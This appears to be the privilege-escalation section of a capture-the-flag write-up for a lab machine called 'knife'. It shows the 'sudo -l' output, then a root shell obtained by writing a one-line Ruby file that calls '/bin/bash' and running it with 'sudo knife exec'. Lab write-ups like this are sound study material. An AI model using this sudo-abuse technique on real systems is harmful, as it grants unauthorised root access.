3 privesc

sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

james@knife:~$ ls -la /usr/bin/knife
lrwxrwxrwx 1 root root 31 May  7 11:03 /usr/bin/knife -> /opt/chef-workstation/bin/knife

Running sudo /usr/bin/knife gives us docs
https://docs.chef.io/workstation/knife/
https://docs.chef.io/workstation/knife_exec/
> so we can create a rb file and run it.

james@knife:/opt/chef-workstation/bin$ cd /home/james
james@knife:~$ echo "system('/bin/bash')" > shell.rb
james@knife:~$ chmod +x shell.rb
james@knife:~$ sudo /usr/bin/knife exec shell.rb
root@knife:/home/james# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

Last updated